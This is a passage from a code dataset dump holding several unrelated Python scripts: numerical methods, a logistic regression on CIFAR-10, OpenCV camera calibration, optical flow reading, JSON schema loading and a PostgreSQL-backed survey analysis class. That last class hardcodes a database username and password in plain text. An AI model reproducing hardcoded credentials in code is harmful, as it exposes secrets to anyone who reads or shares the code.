cauchy_data/cauchy_normalisation, 'r-', label=\"Exact\") # plot actual Cauchy pdf\n plt.legend()\n\n\nplt.show()\n","sub_path":"Assignment3/plot_histogram.py","file_name":"plot_histogram.py","file_ext":"py","file_size_in_byte":831,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"580268378","text":"import scipy\nfrom scipy.misc import derivative\nimport math\n\n'''Newton-Raphson method\n f is a function\n {derivative(f, a, dx=1e-6)} the derivative of f at a\n a is the left end point xn'''\n\nmaxItr = 100\ndef f(x):\n return x**2 - 10*x +23 \n\n\ndef newtonRaph(a):\n iteration = 0\n a += 0.1\n while iteration<maxItr:\n x = 
a - f(a)/derivative(f, a, dx=1e-6)\n        iteration+=1\n        print(\"iteration number =\",iteration)\n        if f(x) == 0:\n            print(\"the zero is\",x)\n            break\n        else:\n            a = x\n        \n    return x\n    \ndef main(a):\n    newtonRaph(a)\n\n","sub_path":"newton_raphson.py","file_name":"newton_raphson.py","file_ext":"py","file_size_in_byte":714,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"499938603","text":"import os\nos.chdir('C:/Users/LUIJK01/Documents/GitHub/image_recognition_cifar10')\n# os.chdir('/Users/rluijk/Documents/image_recognition_cifar10')\n\nimport numpy as np\nimport pandas as pd\nimport seaborn as sns\n\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.model_selection import GridSearchCV\nfrom sklearn.linear_model import LogisticRegression\n\n\n# read data\n# x = np.loadtxt(fname = 'x.txt', delimiter = ',')\n# x_scaled = np.loadtxt(fname = 'x_scaled.txt', delimiter = ',')\npcs = np.loadtxt(fname = 'pcs.txt', delimiter = ',')\nlabels = pd.read_csv('labels.txt', sep='\\t')\ny = {}\nunique_labels = labels.label.unique()\n# map each class name to an integer code\nfor i, label in enumerate(unique_labels):\n    y[label] = i\ny = [y[label] for label in labels['label']]\n\n# split into train and test sets; features are the principal components loaded above\nx_train, x_test, y_train, y_test = train_test_split(pcs, y, train_size = 0.8, random_state = 0)\n\n# parameters\nparams = {\n    'penalty': ['l1'],\n    'C': np.linspace(1, 25, num = 20) # smaller is stronger regularization\n}\n\n# initialize object\nclf = GridSearchCV(estimator = LogisticRegression(), param_grid = params)\n\n# fit data\nclf.fit(X = x_train, y = y_train)\n\n# best parameters\nprint(clf.best_params_) # {'C': 2.263157894736842, 'penalty': 'l1'}\n\n# all parameters and accuracies\ndf = pd.DataFrame({\n    'C': [x['C'] for x in clf.cv_results_['params']],\n    'score': clf.cv_results_['mean_test_score']\n})\nprint(df)\n\nsns.pointplot(x = 'C', y = 'score', data = df)\n\nypred = clf.predict(X = x_test)\nprint(np.mean(ypred == y_test)) # 0.811\n","sub_path":"logistic_regression.py","file_name":"logistic_regression.py","file_ext":"py","file_size_in_byte":1526,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"514577513","text":"import argparse\n\nimport cv2 as cv\nimport numpy as np\n\nfrom util.camera import Camera\n\ndef chessboard_size(s):\n    try:\n        w,h = map(int, s.split(\"x\"))\n        return w,h\n    except:\n        raise argparse.ArgumentTypeError(\"Chessboard size must be WxH (number of inner corners)\")\n\ndef field_size(s):\n    try:\n        try:\n            w = float(s)  # a single number means a square field (H = W)\n            return w, w\n        except:\n            w,h = map(float, s.split(\"x\"))\n            return w,h\n    except:\n        raise argparse.ArgumentTypeError(\"Field size must be WxH or W (interpreted as H=W) [mm]\")\n\n\n\nif __name__ == '__main__':\n    parser = argparse.ArgumentParser(description='Determine camera intrinsics and store to file.')\n    parser.add_argument('--grid-size', type=chessboard_size, default=(7,9), help='Chessboard size (# inner corners)')\n    parser.add_argument('--field-size', type=field_size, default=(22.75, 24.375), help='Size of one grid field [mm]')\n\n    args = parser.parse_args()\n\n    cam = cv.VideoCapture(0)\n    cam.set(cv.CAP_PROP_FRAME_WIDTH, 1280)\n    cam.set(cv.CAP_PROP_FRAME_HEIGHT, 720)\n    cam.set(cv.CAP_PROP_FOURCC, cv.VideoWriter_fourcc(*'MJPG'))\n    cam.set(cv.CAP_PROP_FPS, 60)\n\n    imgpoints = []\n    objpoints = []\n    objp = np.zeros((args.grid_size[0]*args.grid_size[1], 3), dtype=np.float32)\n    objp[:,:2] = np.mgrid[0:args.grid_size[0], 
0:args.grid_size[1]].T.reshape(-1,2)*args.field_size\n\n while True:\n good, img = cam.read()\n if not good:\n break\n img = cv.flip(img, 1)\n grey = cv.cvtColor(img, cv.COLOR_BGR2GRAY)\n found, corners = cv.findChessboardCorners(\n grey, args.grid_size,\n flags = cv.CALIB_CB_FAST_CHECK | cv.CALIB_CB_ADAPTIVE_THRESH)\n cv.drawChessboardCorners(img, args.grid_size, corners, found)\n cv.imshow('Calibration', img)\n\n key = cv.waitKey(15) & 255\n\n if key == ord(' '):\n if found:\n corners = cv.cornerSubPix(\n grey, corners,\n (11, 11), (-1, -1),\n (cv.TERM_CRITERIA_EPS | cv.TERM_CRITERIA_MAX_ITER,\n 30, 0.001))\n objpoints.append(objp)\n imgpoints.append(corners)\n\n if key == 27:\n break\n\n ret, matrix, dist, rvecs, tvecs = cv.calibrateCamera(objpoints, imgpoints, grey.shape[::-1], None, None)\n cam = Camera(matrix, dist)\n cam.save('calibration_params')\n print(cam)\n\n\n\n\n\n","sub_path":"src/calibrate.py","file_name":"calibrate.py","file_ext":"py","file_size_in_byte":2510,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"38711694","text":"# Copyright 2018 Johns Hopkins University (author: Daniel Povey, Desh Raj, Adel Rahimi)\n# Hossein Hadian\n# Yiwen Shao\n\n# Apache 2.0\nimport matplotlib\nmatplotlib.use('Agg')\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom PIL import Image\nfrom io import BytesIO\nimport operator\nfrom scipy import ndimage\nfrom waldo.data_types import *\n\n\ndef visualize_mask(x, c, transparency=0.7, show_labels=True):\n \"\"\"\n This function accepts an object x that should represent an image with a\n mask, a config class c, and a float 0 < transparency < 1.\n It changes the image in-place by overlaying the mask with transparency\n described by the parameter.\n x['img_with_mask'] = image with transparent mask overlay\n \"\"\"\n validate_image_with_mask(x, c)\n im = x['img']\n mask = x['mask']\n plt.clf()\n plt.imshow(im)\n for i in range(1, mask.max() + 1):\n b_mask = (mask == i)\n base_img = np.ones((b_mask.shape[0], b_mask.shape[1], 3))\n color = np.random.random((1, 3)).tolist()[0]\n for k in range(3):\n base_img[:, :, k] = color[k]\n plt.imshow(np.dstack((base_img, b_mask * transparency)))\n if show_labels:\n center = np.round(ndimage.measurements.center_of_mass(b_mask))\n plt.text(center[1] - 2, center[0] + 2, '{}'.format(i), fontsize=7,\n color=color, bbox=dict(facecolor='white',\n edgecolor='none', pad=0))\n\n plt.subplots_adjust(0, 0, 1, 1)\n buffer_ = BytesIO()\n plt.savefig(buffer_, format=\"png\")\n buffer_.seek(0)\n image = Image.open(buffer_)\n x['img_with_mask'] = np.array(image)\n buffer_.close()\n return x\n\n\ndef visualize_polygons(x):\n \"\"\"This function accepts an object x that should represent an image with\n polygonal objects and it modifies the image to superimpose the edges of\n the polygon on it.\n This function returns None; it modifies x in-place.\n \"\"\"\n validate_image_with_objects(x)\n # ... 
do something, modifying x somehow\n    return None\n","sub_path":"scripts/waldo/data_visualization.py","file_name":"data_visualization.py","file_ext":"py","file_size_in_byte":2113,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"633050459","text":"# www.NeatChange.com\n# Make a difference in your life !\n#\n# Poplar Oct 22 2017\n# File extension\n\n\"\"\"\n\nTime limit: 1 second  Memory limit: 32768K\n\n\nProblem description:\nPlease create a function to extract the filename extension from the given path,\nreturn the extracted filename extension or null if none.\n\n\nInput description:\nThe input is a single file path\n\n\nOutput description:\nFor each test case, output the corresponding filename extension\n\n\nExample:\n\nInput\nAbc/file.txt\n\nOutput\ntxt\n\n\"\"\"\n\nx = input().strip()\nif '.' in x:\n    print(x.split('.')[-1])\nelse:\n    print(\"null\")\n\n'''\nRuntime: 44ms  Memory used: 5104k\n'''","sub_path":"Study/Notes/Algorithm/12.文件后缀名.py","file_name":"12.文件后缀名.py","file_ext":"py","file_size_in_byte":614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"548428492","text":"from __future__ import (division, absolute_import, print_function,\n                        unicode_literals)\nfrom builtins import * # NOQA\nfrom future.standard_library import install_aliases\ninstall_aliases() # NOQA\n\nimport json\nimport pkg_resources\n\nimport jsonschema\n\n\ndef validate(doc, schema):\n    \"\"\"Validate a document against a schema.\n\n    This function ensures that additional format checkers (for datetime\n    and URIs) are active.\n    \"\"\"\n    format_checker = jsonschema.FormatChecker()\n    jsonschema.validate(doc, schema, format_checker=format_checker)\n\n\ndef load_schema(schema):\n    \"\"\"Load JSON schema for a SQUASH metric upload.\"\"\"\n    data = pkg_resources.resource_string(__name__,\n                                         'schemas/{}.json'.format(schema))\n    return json.loads(data.decode('utf-8'))\n\n\ndef load_squash_measurements_schema():\n    \"\"\"Load JSON schema for the **measurements** object in a SQUASH job upload.\n    \"\"\"\n    job_schema = load_schema(schema='job')\n\n    m_schema = {\n        \"$schema\": \"http://json-schema.org/draft-04/schema#\",\n        \"title\": \"SQUASH Job upload schema\",\n        \"description\": \"This JSON schema applies POST https://squash.lsst.codes/api/jobs.\", # noqa\n    }\n    m_schema['definitions'] = job_schema['definitions']\n    m_schema.update(job_schema['definitions']['measurements'])\n\n    return m_schema\n\n\ndef load_squash_packages_schema():\n    \"\"\"Load JSON schema for the **packages** object in a SQUASH job upload.\n    \"\"\"\n    job_schema = load_schema(schema='job')\n\n    m_schema = {\n        \"$schema\": \"http://json-schema.org/draft-04/schema#\",\n        \"title\": \"SQUASH Job upload schema\",\n        \"description\": \"This JSON schema applies POST https://squash.lsst.codes/api/jobs.\", # noqa\n    }\n    m_schema['definitions'] = job_schema['definitions']\n    m_schema.update(job_schema['definitions']['packages'])\n\n    return m_schema\n","sub_path":"postqa/schemas.py","file_name":"schemas.py","file_ext":"py","file_size_in_byte":1894,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"277195873","text":"import re\n\ndataSet = \"data_small.txt\"\ndataList = []\ncollectedText = []\nnames = []\nstrain = []\npercent = []\nterp1 = []\nterp2 = []\nterp3 = []\nprice = []\n\n\ndef openFile():\n    global dataList\n    global dataSet\n    print(\"Open File!\")\n    file = open(dataSet, \"r\")\n    # print(file.read())\n\n    for line in file:\n        print(line)\n        dataList.append(line)\n\n\n# Finds the location where the text should be spliced\ndef returnSpaceIndex(dataList, lineSpace, 
newData, phase):\n print(\"space index Function\")\n currentLetter = \"\"\n currentSpace = 0\n\n # Checks for a space\n if phase == 1:\n for line in range(0, len(dataList)):\n for letter in range(0, len(dataList[line])):\n currentLetter = dataList[line][letter]\n if currentLetter == \" \":\n # currentSpace = letter\n lineSpace.append(letter)\n break\n\n # Checks for percentasge (\"00.00%\")\n elif phase == 2:\n print(\"RE Line space function phase 2!\")\n global percent\n global strain\n temp = []\n for line in range(0, len(newData)):\n newText = newData[line]\n # Searches for 00.00% using regex\n returnedText = re.search(\"\\d\\d[.]\\d\\d[%]\", newText)\n returnedIter = re.split(r\"\\d\\d[.]\\d\\d[%]\", newText)\n # print(returnedText)\n percent.append(returnedText.group(0))\n strain.append(returnedIter[0])\n temp.append(returnedIter[1])\n\n # Deletes newData to refill it again with temp\n del newData[:]\n # Refill NewData\n for i in range(0, len(temp)):\n # print(temp[i])\n newData.append(temp[i])\n\n # Check for comma instead of space\n elif phase == 3 or phase == 4:\n for line in range(0, len(newData)):\n for letter in range(0, len(newData[line])):\n currentLetter = newData[line][letter]\n if currentLetter == \",\":\n # currentSpace = letter\n lineSpace.append(letter)\n break\n\n # Check for price (\"$00\")\n elif phase == 5:\n global price\n global terp3\n for line in range(0, len(newData)):\n try:\n newText = newData[line]\n # print(newData[line])\n returnedText = re.search(r\"[$]\\d\\d\", newText)\n returnedIter = re.split(r\"[$]\\d\\d]\", newText)\n # print(returnedText.group(0))\n terp3.append(returnedIter[0][1:2])\n # print(returnedIter[0][:2])\n price.append(returnedText.group(0))\n print(\"Price spliced successfully\")\n except Exception as e:\n print(\"Error in Phase 5: \", e)\n # Shouldn't run, but if issue in initial data, then check for space\n else:\n for line in range(0, len(newData)):\n for letter in range(0, len(newData[line])):\n currentLetter = newData[line][letter]\n if currentLetter == \" \":\n # currentSpace = letter\n lineSpace.append(letter)\n break\n\n\n# Splice the text based off of data return from spaceIndex function and add formatted text to staging list\ndef appendToList(dataList, lineSpace, newData, phase):\n print(\"Append Function\")\n global collectedText\n tempList = []\n for line in range(0, len(newData)):\n # tempList.append(newData[line][(lineSpace[line]):])\n tempList.append(newData[line][(lineSpace[line]):])\n if phase == 1:\n for line in range(0, len(dataList)):\n print(\"Collected text function 1: \", dataList[line][:(lineSpace[line] + 3)])\n collectedText.append(dataList[line][0:(lineSpace[line] + 3)])\n print(\"Collected new data function 1: \", (dataList[line][(lineSpace[line] + 3):]))\n newData.append(dataList[line][(lineSpace[line] + 3):])\n else:\n for line in range(0, len(newData)):\n print(\"Collected text function: \", newData[line][0:(lineSpace[line])])\n collectedText.append(newData[line][0:(lineSpace[line])])\n\n print(\"Collected new tempList function: \", (tempList[line][(lineSpace[line] + 3):]))\n # newData.append(dataList[line][(lineSpace[line] + 3):])\n\n # print(\"Collected text function: \", newData[line][(lineSpace[line]):])\n # collectedText.append(newData[line][(lineSpace[line]):])\n newLen = len(newData)\n del newData[:]\n for line in range(0, newLen):\n print(\"Collected new data function: \", (tempList[line][(lineSpace[line]):]))\n newData.append(tempList[line][(lineSpace[line]):])\n\n\ndef appendToNewList(dataList, 
lineSpace, newData):\n print(\"Append to new list Function\")\n print(\"Append to new list\")\n for line in range(0, len(dataList)):\n print(\"Collected text function: \", dataList[line][:(lineSpace[line])])\n collectedText.append(dataList[line][:(lineSpace[line])])\n\n\n# Appends data to GLOBAL lists based off of phase and then deletes data for reuse\ndef deleteData(dataList, tempData, lineSpace, phase):\n global names, strain, percent, terp1, terp2, terp3, price, collectedText\n print(\"Delete Phase: \", phase) # Current Phase print\n # Everything else besides the \" - \" so \" -\" and \" \"\n for line in range(0, len(collectedText)):\n print(\"First CollectedText to be Deleted: \", collectedText[line])\n # del newData[:]\n if phase == 1:\n # append name to global var\n names.append(collectedText[line])\n if phase == 3:\n # add new data to newData list\n terp1.append(collectedText[line])\n if phase == 4:\n # add new data to newData list\n terp2.append(collectedText[line])\n if phase == 5:\n # add new data to newData list\n terp3.append(collectedText[line])\n del collectedText[:]\n del lineSpace[:]\n # collectedText.append(collectedText[line][lineSpace[line]:])\n\n # Transfer new data to temp, then delete collectedText for use again\n # if line == len(collectedText)-1:\n # for line in range(0, len(collectedText)):\n # tempData.append(collectedText[line])\n # print(\"Temp data: \" + tempData[line])\n\n # for line in range(0, len(collectedText)):\n # collectedText.append(tempData[line][lineSpace[line]:])\n\n\n# Cleaning Data function\ndef cleanData():\n global dataList\n global names\n lineSpace = []\n tempData = []\n newData = []\n phase = 0\n\n print(\"Start data cleaning...\")\n phases = [1, 2, 3, 4, 5]\n\n for phaseNumber in phases:\n print(\"Phase \" + str(phaseNumber))\n returnSpaceIndex(dataList, lineSpace, newData, phaseNumber)\n if phaseNumber != 2 and phaseNumber != 5:\n print(\"Append/Delete \" + str(phaseNumber))\n appendToList(dataList, lineSpace, newData, phaseNumber)\n deleteData(dataList, tempData, lineSpace, phaseNumber)\n\n # del collectedText[:]\n\n\n# print(currentLetter)\n# print(currentSpace)\n\n\ndef testFunction():\n print(\"START TEST FUNCTION:\")\n\n print(names[0])\n print(strain[0])\n print(percent[0])\n print(terp1[0])\n print(terp2[0])\n print(terp3[0])\n print(price[0])\n\n dataDictionary = {\"Company\": \"test\", \"Strain\": \"GG\", \"THC\": \"69.42%\", \"Terp1\": \"C\", \"Terp2\": \"H\", \"Terp3\": \"M\",\n \"Price\": \"$55\"}\n # print(dataDictionary)\n\n\nopenFile()\ncleanData()\ntestFunction()\n","sub_path":"terpsAnalysis - Staging.py","file_name":"terpsAnalysis - Staging.py","file_ext":"py","file_size_in_byte":7558,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"389372424","text":"import numpy as np\nimport struct\nimport skimage.io\nimport matplotlib.pyplot as plt\nfrom matplotlib.patches import ConnectionPatch\n\nfilename = \"/DL_data/MPI-Sintel-complete/training/flow/ambush_2/frame_0003.flo\"\nimg1 = skimage.io.imread(\"/DL_data/MPI-Sintel-complete/training/albedo/ambush_2/frame_0003.png\")\nimg2 = skimage.io.imread(\"/DL_data/MPI-Sintel-complete/training/albedo/ambush_2/frame_0004.png\")\n\n# img1 = skimage.io.imread(\"/DL_data/MPI-Sintel-complete/training/albedo/alley_1/frame_0001.png\")\n# img2 = skimage.io.imread(\"/DL_data/MPI-Sintel-complete/training/albedo/alley_1/frame_0002.png\")\n\nbinFile = open(filename, 'rb')\ntag = binFile.read(4)\nprint(tag)\nwidth = struct.unpack('i', 
binFile.read(4))[0]\nheight = struct.unpack('i', binFile.read(4))[0]\nchannel = 2\nprint(width, height)\n\nflow = np.zeros((height, width, channel))\n\nfor i in range(height):\n\tfor j in range(width):\n\t\tfor k in range(channel):\n\t\t\tval = struct.unpack('f', binFile.read(4))[0]\n\t\t\tflow[i][j][k] = val\n\n# print(flow)\nfig = plt.figure(figsize=(8,8))\nax1 = fig.add_subplot(211)\nplt.imshow(img1)\n\nax2 = fig.add_subplot(212)\nplt.imshow(img2)\n\n# print(np.random.randint(100));exit()\ncolors = \"bcgkmry\"\nfor i in range(height):\n\tfor j in range(width):\n\t\tif(np.random.randint(5000) < 1):\n\t\t\tcon = ConnectionPatch(xyA=(int(j + flow[i][j][0]), int(i + flow[i][j][1])), xyB=(j, i), coordsA=\"data\", coordsB=\"data\",\n\t\t\t axesA=ax2, axesB=ax1, color=colors[np.random.randint(len(colors))])\n\t\t\tax2.add_artist(con)\n\n# print(flow[300][200][0], flow[300][200][1])\n# con = ConnectionPatch(xyA=(int(300 + flow[200][300][0]), int(200 + flow[200][300][1])), xyB=(300, 200), coordsA=\"data\", coordsB=\"data\",\n# \t\t\t axesA=ax2, axesB=ax1, color=\"red\")\n# ax2.add_artist(con)\n\nplt.show()\n\n\ndef readflo(filename):\n\tbinFile = open(filename, 'rb')\n\ttag = binFile.read(4)\n\t# print(tag)\n\twidth = struct.unpack('i', binFile.read(4))[0]\n\theight = struct.unpack('i', binFile.read(4))[0]\n\tchannel = 2\n\t# print(width, height)\n\n\tflow = np.zeros((height, width, channel))\n\n\tfor i in range(height):\n\t\tfor j in range(width):\n\t\t\tfor k in range(channel):\n\t\t\t\tval = struct.unpack('f', binFile.read(4))[0]\n\t\t\t\tflow[i][j][k] = val\n\treturn flow\n","sub_path":"readflo.py","file_name":"readflo.py","file_ext":"py","file_size_in_byte":2220,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"410149351","text":"from django.conf.urls import *\nfrom admin_server_app import views\nimport project_ydyw.settings\n# from .views import UserInfoUpdate\nfrom admin_server_app.views import login\nfrom django.contrib.auth import views as user_views\nfrom django.conf.urls.static import static\nfrom django.conf import settings\nurlpatterns = [\n url(r'^$', views.login),\n url(r'^login/$',views.login),\n url(r'^index/$',views.index),\n url(r'^logout/$',views.logout),\n url(r'^user/list/$',views.userList, name='user_list'),\n url(r'^user/list/(.+)/$',views.userList,name='user_listcc'),\n url(r'^user/$',views.userList),\n url(r'^user/add/$',views.userAdd),\n url(r'^user/alter/(.+)/$',views.userAlter,name='user_alter'),\n # url(r'^user/alter/(?P<id>\\d+)/$', UserInfoUpdate.userAlter,name='user_alter'),\n # url(r'^user/alter/(.+)/$', UserInfoUpdate.userAlter,name='user_alter'),\n url(r'^cmdb/serverlist/$',views.serverList, name='server_list'),\n url(r'^cmdb/serverlist/(.+)/$',views.serverList,name='server_listcc'),\n url(r'^cmdb/serveradd/$',views.serverAdd, name='server_add'),\n url(r'^cmdb/hostadmin/$',views.hostAdmin, name='hostadmin'),\n url(r'^cmdb/monitor/$',views.getMonitor, name='monitor'),\n url(r'^cmdb/$',views.serverList),\n #url(r'^static/(?P<path>.*)$', 'django.views.static.serve',{'document_root': project_ydyw.settings.STATIC_ROOT }),\n] + static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)\n\n","sub_path":"admin_server_app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1441,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"52446002","text":"import zope.i18nmessageid\nfrom AccessControl.Permissions import manage_users as ManageUsers\nfrom 
Products.PluggableAuthService.PluggableAuthService import \\\n registerMultiPlugin\n\nMessageFactory = zope.i18nmessageid.MessageFactory('pmr2.oauth')\n\nfrom plugins import oauth\n\n\nregisterMultiPlugin(oauth.OAuthPlugin.meta_type)\n\ndef initialize(context):\n # XXX should validate whether we have SSL installed.\n\n context.registerClass(oauth.OAuthPlugin,\n permission=ManageUsers,\n constructors=(\n oauth.manage_addOAuthPlugin,\n oauth.addOAuthPlugin,\n ),\n visibility=None,\n icon=\"icon/oauth.png\"\n )\n","sub_path":"pmr2/oauth/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":656,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"244515458","text":"# A rectangle is represented as a list [x1, y1, x2, y2], where (x1, y1) are the coordinates\n#\n# of its bottom-left corner, and (x2, y2) are the coordinates of its top-right corner.\n#\n# Two rectangles overlap if the area of their intersection is positive. To be clear, two\n# rectangles that only touch at the corner or edges do not overlap.\n#\n# Given two (axis-aligned) rectangles, return whether they overlap.\n#\n# Example 1:\n#\n# Input: rec1 = [0,0,2,2], rec2 = [1,1,3,3]\n# Output: true\n# Example 2:\n#\n# Input: rec1 = [0,0,1,1], rec2 = [1,0,2,1]\n# Output: false\n\n\nclass Solution:\n def isRectangleOverlap(self, rec1, rec2):\n \"\"\"\n :type rec1: List[int]\n :type rec2: List[int]\n :rtype: bool\n \"\"\"\n if rec1[0] >= rec2[2]:\n return False\n if rec1[2] <= rec2[0]:\n return False\n if rec1[1] >= rec2[3]:\n return False\n if rec1[3] <= rec2[1]:\n return False\n\n return True\n\n\nif __name__ == '__main__':\n solution = Solution()\n print(solution.isRectangleOverlap([0, 0, 2, 2], [1, 1, 3, 3]))","sub_path":"836_Rectangle_Overlap.py","file_name":"836_Rectangle_Overlap.py","file_ext":"py","file_size_in_byte":1097,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"551792327","text":"from Day3.Grid import Grid\nfrom collections import defaultdict\nimport re\n\n\ndef result(data, part):\n grid = map(lambda s: map(int, re.findall(r'-?\\d+', s)), data)\n matrix = defaultdict(list)\n overlaps = {}\n for (id, x, y, width, height) in grid:\n overlaps[id] = set()\n for i in range(x, x + width):\n for j in range(y, y + height):\n if matrix[(i, j)]:\n for number in matrix[(i, j)]:\n overlaps[id].add(number)\n overlaps[number].add(id)\n matrix[(i, j)].append(id)\n if part == 1:\n return len([k for k in matrix if len(matrix[k]) > 1])\n return [k for k in overlaps if len(overlaps[k]) == 0][0]\n\n\ndef createGrid(matrix, grid):\n return matrix\n\n\ndef partone(data, length):\n matrix = [[0 for i in range(length)] for j in range(length)]\n res = 0\n for row in data:\n grid = Grid(row)\n top, left = grid.get_start_position()\n bottom, right = grid.get_size()\n for i in range(bottom):\n for j in range(right):\n try:\n matrix[top + i][left + j] = matrix[top + i][left + j] + 1\n except IndexError:\n print(str(grid) + \" failed\")\n raise\n for i in range(length):\n for j in range(length):\n if matrix[i][j] > 1:\n res = res + 1\n return res\n\n\ndef parttwo(data, length):\n matrix = [[0 for i in range(length)] for j in range(length)]\n partres = set()\n for row in data:\n grid = Grid(row)\n skip = False\n top, left = grid.get_start_position()\n bottom, right = grid.get_size()\n for i in range(bottom):\n for j in range(right):\n res = matrix[top + i][left + j] + 1\n matrix[top + i][left + j] = res\n if res > 1:\n skip = 
True\n        if skip:\n            continue\n        partres.add(grid.get_id())\n    grids = []\n    for row in data:\n        grids.append(Grid(row))\n    for i in partres:\n        grids[i]\n    pass\n\n\ndef read_file(file_path):\n    \"\"\"\n    Read entries from the given input file.\n    The file has to be defined as:\n    x;y;z\n    x1;y1;z1\n\n    Note:\n    semicolon (;) separation\n    newline (\\n) defines new entry\n    \"\"\"\n    with open(file_path, 'r', newline='') as file:\n        return [x.strip() for x in list(file.readlines())]\n\n\nif __name__ == '__main__':\n    values = read_file('input.csv')\n    print(result(values, 1))\n    print(result(values, 2))\n    print(partone(values, 1000))\n    print(parttwo(values, 1000))\n","sub_path":"AdventOfCode18/Day3/DayThree.py","file_name":"DayThree.py","file_ext":"py","file_size_in_byte":2643,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"156476796","text":"import psycopg2\nimport numpy as np\nimport seaborn as sns; sns.set()\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\n\ndef main():\n    \"\"\"Runs some sample queries on the database. Switch out the passed query in\n    the runQuery() call to view other query results. Note that some \n    combinations of data types are not yet implemented (see createGraph()\n    for details).\"\"\"\n    # Sample queries\n    querySingleCategorical = [\"ETHNIC\", \"\", \"\", \"\"]\n    querySingleContinuous = [\"AGE\", \"\", \"\", \"\"]\n    queryDoubleCategorical = [\"DRINK\", \"RACE\", \"\", \"\"]\n    queryCategoricalvContinuous = [\"AGE\", \"EDUC\", \"\", \"\"]\n    # Running the queries\n    ds = DataSource()\n    ds.runQuery(queryDoubleCategorical)\n    print(ds.getStats())\n    ds.createGraph()\n\nclass DataSource:\n    \"\"\"Implements the backend of Will Schwarzer's and Nathan Mannes's web\n    project. Used as follows: first call runQuery(query), then either\n    getStats() or createGraph().\"\"\"\n    \n    def __init__(self):\n        # Create database connection\n        self.connection = psycopg2.connect(\"dbname=mannesn user=mannesn\" +\n            \" password=snail647spring host=localhost\")\n        self.initializeCursor()\n        # Future pandas objects\n        self.theDataFrame = None\n        self.theSeries = None\n        # Future data arrays\n        self.dataArray = []\n        self.percentageArray = []\n        # Query info\n        self.primary = self.secondary = self.control1 = self.control2 = \"\"\n        # Data types are stored on the instance so they are not shared as class variables\n        self.dataTypePrimary = self.dataTypeSecondary = \"\"\n        # Dictionary of descriptions, used to create better graph labels\n        self.descriptionDict = np.load(\"descriptionDict.npy\").item()\n\n    def runQuery(self, query):\n        \"\"\"Runs the given query on the database and stores the results as\n        instance variables.\"\"\"\n        self.parseQueryVariables(query)\n        self.dataArray = self.getDataArray()\n        self.percentageArray = self.getPercentageArray(self.dataArray)\n    \n    def getStats(self):\n        \"\"\"Currently just returns number of respondents to a given query.\"\"\"\n        # All counts in the data array are in the second row and beyond,\n        # possibly including some row headers\n        count = 0\n        for row in self.dataArray[1:]:\n            for i in range(len(row)):\n                try:\n                    count += int(row[i])\n                except:\n                    # Was a row header, continue to rest of row\n                    continue\n        return count\n    \n    def createGraph(self):\n        \"\"\"Saves the appropriate type of graph for the query as output.png.\"\"\"\n        type1 = self.dataTypePrimary\n        type2 = self.dataTypeSecondary\n        if type2 == \"\":\n            self.getBarPlot(self.dataArray)\n        else:\n            self.getHeatMap(self.dataArray)\n    \n    def parseQueryVariables(self, query):\n        \"\"\"Saves the desired 
variables for this query\"\"\"\n self.primary = query[0]\n self.secondary = query[1]\n #Controls are not yet implemented\n self.control1 = \"\"\n self.control2 = \"\"\n \n ### DATABASE MANAGEMENT ###\n \n def getDataArray(self):\n dict = self.getDictionary()\n if self.secondary != \"\":\n return self.dictionaryToArrayTwoVariables(dict)\n else:\n return self.dictionaryToArrayOneVariable(dict) \n \n def getPercentageArray(self, dataArray):\n percentageArray = [dataArray[0]]\n columnSums = []\n for i in range(1, len(dataArray[0])):\n columnSum = 0\n for row in dataArray[1:]:\n columnSum += row[i]\n columnSums.append(columnSum)\n for i in range(1, len(dataArray)):\n newRow = [dataArray[i][0]]\n for j in range(1, len(dataArray[0])):\n newRow.append(dataArray[i][j]/columnSums[j-1])\n percentageArray.append(newRow)\n return percentageArray\n \n \n def dictionaryToArrayOneVariable(self, dict):\n \"\"\"Takes the dictonary of combinations of responses and the \n number of times those combos occur, and generates a list in a format\n that can be graphed later\"\"\"\n self.dataTypePrimary = self.getDataType(self.primary, dict)\n orderedRow = self.getOrderedVariables(self.primary, dict)\n values = []\n counts = []\n for response in orderedRow:\n try:\n # If that response appeared, add it\n counts.append(dict[(response,)])\n values.append(response.title())\n except KeyError:\n # That response didn't actually appear; ignore it\n continue\n returnArray = [values, counts]\n self.dataArray = returnArray\n return returnArray \n \n def dictionaryToArrayTwoVariables(self, dict):\n \"\"\"Takes the dictonary of combinations of responses and the \n number of times those combos occur, and generates a list in a format\n that can be graphed later\"\"\"\n self.dataTypePrimary = self.getDataType(self.primary, dict)\n self.dataTypeSecondary = self.getDataType(self.secondary, dict)\n orderedRow = self.getOrderedVariables(self.primary, dict)\n orderedColumn = self.getOrderedVariables(self.secondary, dict)\n # Lowercase values look better in the graph; also applies to line 145\n orderedColumnLowerCase = [value.title() for value in orderedColumn]\n array = []\n array.append([\"\"] + orderedColumnLowerCase)\n for rowvar in orderedRow:\n nextRow = []\n nextRow.append(rowvar.title())\n for column in orderedColumn:\n nextRow.append(self.fetchCountTwoVariables(dict, rowvar, column))\n array.append(nextRow)\n self.dataArray = array\n return array\n \n def getDictionary(self):\n 